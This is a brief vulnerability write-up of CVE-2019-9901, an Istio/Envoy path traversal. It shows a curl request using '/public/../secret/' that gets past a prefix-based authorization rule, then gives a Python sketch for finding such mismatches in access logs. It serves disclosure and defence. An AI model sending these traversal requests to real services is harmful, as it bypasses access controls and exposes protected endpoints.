CVE-2019-9901 - Istio/Envoy Path traversal
This scenario demo has been taken from https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md. Thanks to Erlend Oftedal.
A simple project with a web server was deployed on Kubernetes. The web application had two endpoints, /public/ and /secret/. An authorization policy was added that tried to grant access to anything below /public/:
rules:
- services: ["backend.fishy.svc.cluster.local"]
  methods: ["GET"]
  paths: ["/public/*"]
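Then a standard path traversal was sent with curl, using --path-as-is so that curl does not collapse the ../ segment before sending the request: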
curl -vvvv --path-as-is "http://backend.fishy.svc.cluster.local:8081/public/../secret/"
And was able to reach /secret/.
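The mismatch behind this result can be modelled offline. The following is an added example, not code from the original write-up or from Istio/Envoy: it compares a prefix check on the path as received with the same check on the normalized path, and lists the requests where the two decisions differ. The function names and sample paths are constructed, and percent-decoding is assumed to be out of scope.

```python
import posixpath

# Constructed stand-in for the policy rule shown above.
ALLOWED_PATHS = ["/public/*"]

def matches(path, pattern):
    """Exact match, or prefix match when the pattern ends in '*'."""
    if pattern.endswith("*"):
        return path.startswith(pattern[:-1])
    return path == pattern

def normalize(path):
    """Resolve '.', '..' and repeated slashes the way a backend router typically does.
    Assumption: percent-decoding is out of scope for this sketch."""
    norm = "/" + posixpath.normpath(path).lstrip("/")
    # normpath drops the trailing slash; keep it so directory-style paths still match.
    if path.endswith("/") and norm != "/":
        norm += "/"
    return norm

def allowed_raw(path):
    """Decision taken on the path exactly as received (no normalization)."""
    return any(matches(path, p) for p in ALLOWED_PATHS)

def allowed_normalized(path):
    """Decision taken on the path the backend will actually serve."""
    return any(matches(normalize(path), p) for p in ALLOWED_PATHS)

def find_mismatches(paths):
    """Paths the raw check allows but the normalized check denies."""
    return [p for p in paths if allowed_raw(p) and not allowed_normalized(p)]

# Constructed request paths, as they might appear in proxy access logs.
SAMPLE_PATHS = [
    "/public/index.html",
    "/public/../secret/",
    "/secret/",
    "/public/./a",
    "/public/a/../../secret/",
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{p!r:32} raw={allowed_raw(p)!s:5} normalized={allowed_normalized(p)}")
    print("policy bypass candidates:", find_mismatches(SAMPLE_PATHS))
```

Running find_mismatches over real access-log paths gives a quick list of requests that a raw prefix rule would have let through to a path outside /public/.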